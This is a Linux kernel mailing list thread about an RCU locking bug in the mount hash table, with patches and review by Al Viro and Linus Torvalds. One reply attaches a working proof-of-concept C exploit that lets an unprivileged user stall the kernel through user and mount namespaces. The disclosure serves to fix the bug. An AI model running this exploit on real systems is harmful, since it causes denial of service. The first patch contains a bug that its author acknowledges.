* [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting
@ 2014-03-19 21:22 Max Kellermann
From: Max Kellermann @ 2014-03-19 21:22 UTC (permalink / raw)
To: viro; +Cc: max, linux-kernel
mount.mnt_hash is RCU-protected. However, list_move() breaks RCU
protection: when one thread walks the linked list while another calls
list_move(), it may "redirect" the first thread into the new list,
making it loop endlessly in __lookup_mnt(), because the list head is
never found.
The right way to delete items from an RCU-protected list is
list_del_rcu(). Before the item is inserted into another list
(completing the list_move), synchronize_rcu() must be called.
umount_tree() has code to implement this kind of protection; it moves
the "mount" object to the global list "unmounted", to be cleaned up by
namespace_unlock() after a synchronize_rcu() call. This however did
not work because umount_tree() reused the "mnt_hash" attribute for the
"unmounted" list.
In the presence of user+mount namespaces, this bug can be exploited by
any unprivileged user to stall the kernel (denial of service by soft
lockup).
The fix is to avoid reusing "mnt_hash". This patch adds a new
list_head attribute dedicated to umounting. This avoids clobbering
mnt_hash.next, allowing all RCU-locked threads to continue walking the
list until namespace_unlock() is called.
This regression was caused by commit 48a066e7 ("RCU'd vfsmounts").
All releases since 3.12-rc5 are affected.
Signed-off-by: Max Kellermann <mk@cm4all.com>
---
fs/mount.h | 1 +
fs/namespace.c | 12 +++++++-----
fs/pnode.c | 8 +++++---
3 files changed, 13 insertions(+), 8 deletions(-)
diff --git a/fs/mount.h b/fs/mount.h
index a17458c..9cfdf94 100644
--- a/fs/mount.h
+++ b/fs/mount.h
@@ -36,6 +36,7 @@ struct mount {
int mnt_count;
int mnt_writers;
#endif
+ struct list_head mnt_unmounted; /* list of mounts being unmounted */
struct list_head mnt_mounts; /* list of children, anchored here */
struct list_head mnt_child; /* and going through their mnt_child */
struct list_head mnt_instance; /* mount instance on sb->s_mounts */
diff --git a/fs/namespace.c b/fs/namespace.c
index 338ccc2..2aa0a14 100644
--- a/fs/namespace.c
+++ b/fs/namespace.c
@@ -1171,8 +1171,8 @@ static void namespace_unlock(void)
synchronize_rcu();
while (!list_empty(&head)) {
- mnt = list_first_entry(&head, struct mount, mnt_hash);
- list_del_init(&mnt->mnt_hash);
+ mnt = list_first_entry(&head, struct mount, mnt_unmounted);
+ list_del_init(&mnt->mnt_unmounted);
if (mnt->mnt_ex_mountpoint.mnt)
path_put(&mnt->mnt_ex_mountpoint);
mntput(&mnt->mnt);
@@ -1196,13 +1196,15 @@ void umount_tree(struct mount *mnt, int how)
LIST_HEAD(tmp_list);
struct mount *p;
- for (p = mnt; p; p = next_mnt(p, mnt))
- list_move(&p->mnt_hash, &tmp_list);
+ for (p = mnt; p; p = next_mnt(p, mnt)) {
+ list_del_rcu(&p->mnt_hash);
+ list_add(&p->mnt_unmounted, &tmp_list);
+ }
if (how)
propagate_umount(&tmp_list);
- list_for_each_entry(p, &tmp_list, mnt_hash) {
+ list_for_each_entry(p, &tmp_list, mnt_unmounted) {
list_del_init(&p->mnt_expire);
list_del_init(&p->mnt_list);
__touch_mnt_namespace(p->mnt_ns);
diff --git a/fs/pnode.c b/fs/pnode.c
index c7221bb..4bca573 100644
--- a/fs/pnode.c
+++ b/fs/pnode.c
@@ -338,8 +338,10 @@ static void __propagate_umount(struct mount *mnt)
* umount the child only if the child has no
* other children
*/
- if (child && list_empty(&child->mnt_mounts))
- list_move_tail(&child->mnt_hash, &mnt->mnt_hash);
+ if (child && list_empty(&child->mnt_mounts)) {
+ list_del_rcu(&child->mnt_hash);
+ list_add(&child->mnt_unmounted, &mnt->mnt_hash);
+ }
}
}
@@ -354,7 +356,7 @@ int propagate_umount(struct list_head *list)
{
struct mount *mnt;
- list_for_each_entry(mnt, list, mnt_hash)
+ list_for_each_entry(mnt, list, mnt_unmounted)
__propagate_umount(mnt);
return 0;
}
* [PATCH 2/2] fs/namespace: use RCU list functions for mnt_hash
@ 2014-03-19 21:22 Max Kellermann
From: Max Kellermann @ 2014-03-19 21:22 UTC (permalink / raw)
To: viro; +Cc: max, linux-kernel

mount.mnt_hash is RCU-protected, and therefore we must use the RCU
variants to manipulate the list.

Signed-off-by: Max Kellermann <mk@cm4all.com>
---
 fs/namespace.c | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)

diff --git a/fs/namespace.c b/fs/namespace.c
index 2aa0a14..295a0c0 100644
--- a/fs/namespace.c
+++ b/fs/namespace.c
@@ -22,6 +22,7 @@
 #include <linux/fsnotify.h>    /* fsnotify_vfsmount_delete */
 #include <linux/uaccess.h>
 #include <linux/proc_ns.h>
+#include <linux/rculist.h>
 #include <linux/magic.h>
 #include "pnode.h"
 #include "internal.h"
@@ -739,8 +740,8 @@ static void attach_mnt(struct mount *mnt,
 			struct mountpoint *mp)
 {
 	mnt_set_mountpoint(parent, mp, mnt);
-	list_add_tail(&mnt->mnt_hash, mount_hashtable +
-			hash(&parent->mnt, mp->m_dentry));
+	list_add_tail_rcu(&mnt->mnt_hash, mount_hashtable +
+			hash(&parent->mnt, mp->m_dentry));
 	list_add_tail(&mnt->mnt_child, &parent->mnt_mounts);
 }
@@ -762,8 +763,8 @@ static void commit_tree(struct mount *mnt)
 	list_splice(&head, n->list.prev);
-	list_add_tail(&mnt->mnt_hash, mount_hashtable +
-			hash(&parent->mnt, mnt->mnt_mountpoint));
+	list_add_tail_rcu(&mnt->mnt_hash, mount_hashtable +
+			hash(&parent->mnt, mnt->mnt_mountpoint));
 	list_add_tail(&mnt->mnt_child, &parent->mnt_mounts);
 	touch_mnt_namespace(n);
 }
* Re: [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting
@ 2014-03-19 21:24 Max Kellermann
From: Max Kellermann @ 2014-03-19 21:24 UTC (permalink / raw)
To: viro, linux-kernel

[-- Attachment #1: Type: text/plain, Size: 250 bytes --]

On 2014/03/19 22:22, Max Kellermann <mk@cm4all.com> wrote:
> In the presence of user+mount namespaces, this bug can be exploited by
> any unprivileged user to stall the kernel (denial of service by soft
> lockup).

Proof-of-concept exploit attached.

[-- Attachment #2: rcumount.c --]
[-- Type: text/x-csrc, Size: 1878 bytes --]

/*
 * Exploit for linux commit 48a066e72d970a3e225a9c18690d570c736fc455:
 * endless loop in __lookup_mnt() because the mount_hashtable does not
 * have enough RCU protection.
 *
 * How to use:
 *
 *   gcc -D_GNU_SOURCE -std=gnu99 -o rcumount rcumount.c && ./rcumount
 *
 * Wait a few minutes until "rcu_sched self-detected stall" appears.
 * The machine is now unusable.
 *
 * Author: Max Kellermann <max@duempel.org>
 */

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sched.h>
#include <sys/mount.h>
#include <sys/stat.h>

static void stress(void)
{
	/* make all mounts private so our namespace "owns" them */
	mount(NULL, "/", NULL, MS_PRIVATE|MS_REC, NULL);

	while (1) {
		/* stress the mount_hashtable, which will at some point
		   modify a list_head that is RCU-protected but still
		   referenced by another kernel thread; this may or may
		   not lead that other kernel thread into an endless
		   loop inside __lookup_mnt(), which never sees the
		   list head again */
		if (mount("none", "/tmp", "tmpfs", 0,
			  "size=16M,nr_inodes=256") == 0)
			umount2("/tmp", MNT_DETACH);

		/* ask the kernel to walk the mount hash, which may
		   trigger the endless __lookup_mnt() loop */
		struct stat st;
		stat("/tmp/..", &st);
	}
}

static int fn(void *arg)
{
	(void)arg;

	/* launch child processes */
	for (unsigned i = 0; i < 32; ++i) {
		if (fork() == 0) {
			stress();
			exit(0);
		}
	}

	/* cleanup */
	int status;
	do {} while (wait(&status) > 0);
	return 0;
}

int main(int argc, char **argv)
{
	/* create a new user+vfs namespace which allows us to mount() */
	char stack[65536];
	clone(fn, stack + sizeof(stack),
	      SIGCHLD|CLONE_NEWNS|CLONE_NEWUSER, NULL);

	/* cleanup */
	int status;
	wait(&status);
	return 0;
}
* Re: [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting
@ 2014-03-19 21:37 Max Kellermann
From: Max Kellermann @ 2014-03-19 21:37 UTC (permalink / raw)
To: viro; +Cc: linux-kernel

On 2014/03/19 22:22, Max Kellermann <mk@cm4all.com> wrote:
> +			list_add(&child->mnt_unmounted, &mnt->mnt_hash);

This is obviously a bug in my patch, sorry.  Will resend a fixed patch.
* [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2]
@ 2014-03-19 21:39 Max Kellermann
From: Max Kellermann @ 2014-03-19 21:39 UTC (permalink / raw)
To: viro; +Cc: max, linux-kernel

mount.mnt_hash is RCU-protected. However, list_move() breaks RCU
protection: when one thread walks the linked list while another calls
list_move(), it may "redirect" the first thread into the new list,
making it loop endlessly in __lookup_mnt(), because the list head is
never found.

The right way to delete items from an RCU-protected list is
list_del_rcu(). Before the item is inserted into another list
(completing the list_move), synchronize_rcu() must be called.

umount_tree() has code to implement this kind of protection; it moves
the "mount" object to the global list "unmounted", to be cleaned up by
namespace_unlock() after a synchronize_rcu() call. This however did
not work because umount_tree() reused the "mnt_hash" attribute for the
"unmounted" list.

In the presence of user+mount namespaces, this bug can be exploited by
any unprivileged user to stall the kernel (denial of service by soft
lockup).

The fix is to avoid reusing "mnt_hash". This patch adds a new
list_head attribute dedicated to umounting. This avoids clobbering
mnt_hash.next, allowing all RCU-locked threads to continue walking the
list until namespace_unlock() is called.

This regression was caused by commit 48a066e7 ("RCU'd vfsmounts").
All releases since 3.12-rc5 are affected.

Signed-off-by: Max Kellermann <mk@cm4all.com>
---
 fs/mount.h     |  1 +
 fs/namespace.c | 12 +++++++-----
 fs/pnode.c     |  8 +++++---
 3 files changed, 13 insertions(+), 8 deletions(-)

diff --git a/fs/mount.h b/fs/mount.h
index a17458c..9cfdf94 100644
--- a/fs/mount.h
+++ b/fs/mount.h
@@ -36,6 +36,7 @@ struct mount {
 	int mnt_count;
 	int mnt_writers;
 #endif
+	struct list_head mnt_unmounted;	/* list of mounts being unmounted */
 	struct list_head mnt_mounts;	/* list of children, anchored here */
 	struct list_head mnt_child;	/* and going through their mnt_child */
 	struct list_head mnt_instance;	/* mount instance on sb->s_mounts */
diff --git a/fs/namespace.c b/fs/namespace.c
index 338ccc2..2aa0a14 100644
--- a/fs/namespace.c
+++ b/fs/namespace.c
@@ -1171,8 +1171,8 @@ static void namespace_unlock(void)
 	synchronize_rcu();
 	while (!list_empty(&head)) {
-		mnt = list_first_entry(&head, struct mount, mnt_hash);
-		list_del_init(&mnt->mnt_hash);
+		mnt = list_first_entry(&head, struct mount, mnt_unmounted);
+		list_del_init(&mnt->mnt_unmounted);
 		if (mnt->mnt_ex_mountpoint.mnt)
 			path_put(&mnt->mnt_ex_mountpoint);
 		mntput(&mnt->mnt);
@@ -1196,13 +1196,15 @@ void umount_tree(struct mount *mnt, int how)
 	LIST_HEAD(tmp_list);
 	struct mount *p;
-	for (p = mnt; p; p = next_mnt(p, mnt))
-		list_move(&p->mnt_hash, &tmp_list);
+	for (p = mnt; p; p = next_mnt(p, mnt)) {
+		list_del_rcu(&p->mnt_hash);
+		list_add(&p->mnt_unmounted, &tmp_list);
+	}
 	if (how)
 		propagate_umount(&tmp_list);
-	list_for_each_entry(p, &tmp_list, mnt_hash) {
+	list_for_each_entry(p, &tmp_list, mnt_unmounted) {
 		list_del_init(&p->mnt_expire);
 		list_del_init(&p->mnt_list);
 		__touch_mnt_namespace(p->mnt_ns);
diff --git a/fs/pnode.c b/fs/pnode.c
index c7221bb..c16c5d64 100644
--- a/fs/pnode.c
+++ b/fs/pnode.c
@@ -338,8 +338,10 @@ static void __propagate_umount(struct mount *mnt)
 		 * umount the child only if the child has no
 		 * other children
 		 */
-		if (child && list_empty(&child->mnt_mounts))
-			list_move_tail(&child->mnt_hash, &mnt->mnt_hash);
+		if (child && list_empty(&child->mnt_mounts)) {
+			list_del_rcu(&child->mnt_hash);
+			list_add(&child->mnt_unmounted, &mnt->mnt_unmounted);
+		}
 	}
 }
@@ -354,7 +356,7 @@ int propagate_umount(struct list_head *list)
 {
 	struct mount *mnt;
-	list_for_each_entry(mnt, list, mnt_hash)
+	list_for_each_entry(mnt, list, mnt_unmounted)
 		__propagate_umount(mnt);
 	return 0;
 }
* Re: [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2]
@ 2014-03-20  3:48 Al Viro
From: Al Viro @ 2014-03-20 3:48 UTC (permalink / raw)
To: Max Kellermann; +Cc: max, linux-kernel, Linus Torvalds

On Wed, Mar 19, 2014 at 10:39:45PM +0100, Max Kellermann wrote:
> mount.mnt_hash is RCU-protected. However, list_move() breaks RCU
> protection: when one thread walks the linked list while another calls
> list_move(), it may "redirect" the first thread into the new list,
> making it loop endlessly in __lookup_mnt(), because the list head is
> never found.
>
> The right way to delete items from an RCU-protected list is
> list_del_rcu(). Before the item is inserted into another list
> (completing the list_move), synchronize_rcu() must be called.
>
> The fix is to avoid reusing "mnt_hash". This patch adds a new
> list_head attribute dedicated to umounting. This avoids clobbering
> mnt_hash.next, allowing all RCU-locked threads to continue walking the
> list until namespace_unlock() is called.

NAK. Nice catch, the bug is real, but the fix is wrong. For one thing,
you have missed detach_mnt()/attach_mnt(), so you are not covering all
places where the sucker might be removed from the list. For another, I
don't believe that this is the right approach.

The *only* thing we care about is not getting stuck in __lookup_mnt().
If it misses an entry because something in front of it just got moved
around, etc., we are fine. We'll notice that mount_lock mismatch and
that'll be it.

IOW, there are two problems here:
(1) we can, indeed, get caught into an infinite loop.
(2) __follow_mount_rcu() and follow_mount_rcu() ought to recheck
nd->m_seq and bugger off with ECHILD in case of mismatch (the latter
probably ought to be folded into follow_dotdot_rcu()).
legitimize_mnt() will fail in the end of lookup *and* we are risking
an incorrect hard error if we fail to cross a mountpoint and continue
under it.

I would prefer to deal with (1) by turning mnt_hash into hlist; the
problem with that is __lookup_mnt_last(). That sucker is only called
under mount_lock, so RCU issues do not play there, but it's there and
it complicates things. There might be a way to get rid of that thing
for good, but that's more invasive than what I'd be happy with for
backports.

Let's just have __lookup_mnt() recheck mount_lock if it goes for too
long - e.g. every 256 iterations (and if the hash chain is that long,
the price of extra smp_rmb() + fetching seqcount won't matter anyway).
And have the fs/namei.c callers check nd->m_seq properly (lookup_mnt()
already does). I've looked into taking the check into __lookup_mnt()
itself, but it leads to clumsier calling conventions and worse code in
callers.

How about the following (completely untested yet):

diff --git a/fs/mount.h b/fs/mount.h
index 46790ae1..905d1bc 100644
--- a/fs/mount.h
+++ b/fs/mount.h
@@ -77,7 +77,7 @@ static inline int is_mounted(struct vfsmount *mnt)
 	return !IS_ERR_OR_NULL(real_mount(mnt)->mnt_ns);
 }
-extern struct mount *__lookup_mnt(struct vfsmount *, struct dentry *);
+extern struct mount *__lookup_mnt(struct vfsmount *, struct dentry *, unsigned seq);
 extern struct mount *__lookup_mnt_last(struct vfsmount *, struct dentry *);
 extern bool legitimize_mnt(struct vfsmount *, unsigned);
diff --git a/fs/namei.c b/fs/namei.c
index d6e32a1..458572b 100644
--- a/fs/namei.c
+++ b/fs/namei.c
@@ -1115,7 +1115,7 @@ static bool __follow_mount_rcu(struct nameidata *nd, struct path *path,
 		if (!d_mountpoint(path->dentry))
 			break;
-		mounted = __lookup_mnt(path->mnt, path->dentry);
+		mounted = __lookup_mnt(path->mnt, path->dentry, nd->m_seq);
 		if (!mounted)
 			break;
 		path->mnt = &mounted->mnt;
@@ -1129,20 +1129,7 @@ static bool __follow_mount_rcu(struct nameidata *nd, struct path *path,
 		 */
 		*inode = path->dentry->d_inode;
 	}
-	return true;
-}
-
-static void follow_mount_rcu(struct nameidata *nd)
-{
-	while (d_mountpoint(nd->path.dentry)) {
-		struct mount *mounted;
-		mounted = __lookup_mnt(nd->path.mnt, nd->path.dentry);
-		if (!mounted)
-			break;
-		nd->path.mnt = &mounted->mnt;
-		nd->path.dentry = mounted->mnt.mnt_root;
-		nd->seq = read_seqcount_begin(&nd->path.dentry->d_seq);
-	}
+	return read_seqretry(&mount_lock, nd->m_seq);
 }

 static int follow_dotdot_rcu(struct nameidata *nd)
@@ -1170,7 +1157,17 @@ static int follow_dotdot_rcu(struct nameidata *nd)
 			break;
 		nd->seq = read_seqcount_begin(&nd->path.dentry->d_seq);
 	}
-	follow_mount_rcu(nd);
+	while (d_mountpoint(nd->path.dentry)) {
+		struct mount *mounted;
+		mounted = __lookup_mnt(nd->path.mnt, nd->path.dentry, nd->m_seq);
+		if (!mounted)
+			break;
+		nd->path.mnt = &mounted->mnt;
+		nd->path.dentry = mounted->mnt.mnt_root;
+		nd->seq = read_seqcount_begin(&nd->path.dentry->d_seq);
+		if (!read_seqretry(&mount_lock, nd->m_seq))
+			goto failed;
+	}
 	nd->inode = nd->path.dentry->d_inode;
 	return 0;
diff --git a/fs/namespace.c b/fs/namespace.c
index 203475b..72c20b0 100644
--- a/fs/namespace.c
+++ b/fs/namespace.c
@@ -599,16 +599,23 @@ bool legitimize_mnt(struct vfsmount *bastard, unsigned seq)
 /*
  * find the first mount at @dentry on vfsmount @mnt.
- * call under rcu_read_lock()
+ * call under rcu_read_lock().  seq is normally *not* checked - that's
+ * for the caller to deal with; here we are just breaking infinite loops.
+ * If we get hash chains longer than 256 elements, the price of extra
+ * smp_rmb() won't matter.
 */
-struct mount *__lookup_mnt(struct vfsmount *mnt, struct dentry *dentry)
+struct mount *__lookup_mnt(struct vfsmount *mnt, struct dentry *dentry, unsigned seq)
 {
 	struct list_head *head = m_hash(mnt, dentry);
 	struct mount *p;
+	unsigned char n = 0;
-	list_for_each_entry_rcu(p, head, mnt_hash)
+	list_for_each_entry_rcu(p, head, mnt_hash) {
+		if (unlikely(!--n) && !read_seqretry(&mount_lock, seq))
+			break;
 		if (&p->mnt_parent->mnt == mnt && p->mnt_mountpoint == dentry)
 			return p;
+	}
 	return NULL;
 }
@@ -652,7 +659,7 @@ struct vfsmount *lookup_mnt(struct path *path)
 	rcu_read_lock();
 	do {
 		seq = read_seqbegin(&mount_lock);
-		child_mnt = __lookup_mnt(path->mnt, path->dentry);
+		child_mnt = __lookup_mnt(path->mnt, path->dentry, seq);
 		m = child_mnt ? &child_mnt->mnt : NULL;
 	} while (!legitimize_mnt(m, seq));
 	rcu_read_unlock();
* Re: [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2]
@ 2014-03-20  4:02 Linus Torvalds
From: Linus Torvalds @ 2014-03-20 4:02 UTC (permalink / raw)
To: Al Viro; +Cc: Max Kellermann, max, Linux Kernel Mailing List

On Wed, Mar 19, 2014 at 8:48 PM, Al Viro <viro@zeniv.linux.org.uk> wrote:
>
> NAK. Nice catch, the bug is real, but the fix is wrong. For one thing,
> you have missed detach_mnt()/attach_mnt(), so you are not covering
> all places where the sucker might be removed from the list. For another,
> I don't believe that this is the right approach.
>
> The *only* thing we care about is not getting stuck in __lookup_mnt().

Quite frankly, if that's the main issue, then may I suggest aiming to
use a 'hlist' instead of a doubly-linked list? Those have the
advantage that they are NULL-terminated.

Yeah, hlists have some disadvantages too, which might not make them
work in this case, but really, for mnt_hash? hlists are generally
*exactly* what you want for hash lists, because the head is smaller.
And because of the NULL termination rather than having the head used
in the middle of a circular list, you don't get the termination
problems when moving entries across chains.

I did not look whether there was some reason a hlist isn't appropriate
here. Maybe you can tell me. Or go "yeah, a hlist would work nicely".

               Linus
* Re: [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2]
@ 2014-03-20  4:21 Al Viro
From: Al Viro @ 2014-03-20 4:21 UTC (permalink / raw)
To: Linus Torvalds; +Cc: Max Kellermann, max, Linux Kernel Mailing List

On Wed, Mar 19, 2014 at 09:02:33PM -0700, Linus Torvalds wrote:
> Quite frankly, if that's the main issue, then may I suggest aiming to
> use a 'hlist' instead of a doubly-linked list? Those have the
> advantage that they are NULL-terminated.
>
> Yeah, hlists have some disadvantages too, which might not make them
> work in this case, but really, for mnt_hash? hlists are generally
> *exactly* what you want for hash lists, because the head is smaller.
> And because of the NULL termination rather than having the head used
> in the middle of a circular list, you don't get the termination
> problems when moving entries across chains.
>
> I did not look whether there was some reason a hlist isn't appropriate
> here. Maybe you can tell me.

Er... I have, actually, right in the part you've snipped ;-)

<unsnip>
I would prefer to deal with (1) by turning mnt_hash into hlist; the
problem with that is __lookup_mnt_last(). That sucker is only called
under mount_lock, so RCU issues do not play there, but it's there and
it complicates things. There might be a way to get rid of that thing
for good, but that's more invasive than what I'd be happy with for
backports.
</unsnip>

hlist _is_ better, no questions there, but surgery required to deal
with __lookup_mnt_last()[1] is too invasive for backports and even
more so - for -final. I would prefer to have the merge window happen
after LSF/MM, obviously, but I thought you wanted to open it this
Sunday?

[1] that is, with cases like "/tmp/b is a slave of /tmp/a, bind foo on
/tmp/b/c, then bind bar on /tmp/a/c, then umount /tmp/a/c". The only
kinda-sorta sane semantics we'd been able to come up with is what we
do right now and that's where __lookup_mnt_last() has come from.
* Re: [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2]
@ 2014-03-20  4:58 Linus Torvalds
From: Linus Torvalds @ 2014-03-20 4:58 UTC (permalink / raw)
To: Al Viro; +Cc: Max Kellermann, max, Linux Kernel Mailing List

On Wed, Mar 19, 2014 at 9:21 PM, Al Viro <viro@zeniv.linux.org.uk> wrote:
>
> Er... I have, actually, right in the part you've snipped ;-)

Heh. That's what I get for just reading the patch, and skimming the
explanation.

> I would prefer to deal with (1) by turning mnt_hash into hlist; the problem
> with that is __lookup_mnt_last(). That sucker is only called under
> mount_lock, so RCU issues do not play there, but it's there and it
> complicates things. There might be a way to get rid of that thing for
> good, but that's more invasive than what I'd be happy with for backports.

Yeah. I see what you're saying.

That said, if we expect the mnt_hash queues to be short (and they
really should be), that whole __lookup_mnt_last() could just be

	struct mount *p, *result = NULL;

	hlist_for_each_entry(p, head, mnt_hash)
		if (&p->mnt_parent->mnt == mnt && p->mnt_mountpoint == dentry)
			result = p;
	return result;

which is certainly simple. Sure, it always walks the whole list, but
as far as I can tell the callers aren't exactly performance-critical,
and we're talking about a hlist that should be just a couple of
entries in size..

So if that's the _only_ thing holding back using hlists, I'd say we
should just do the above trivial conversion.

               Linus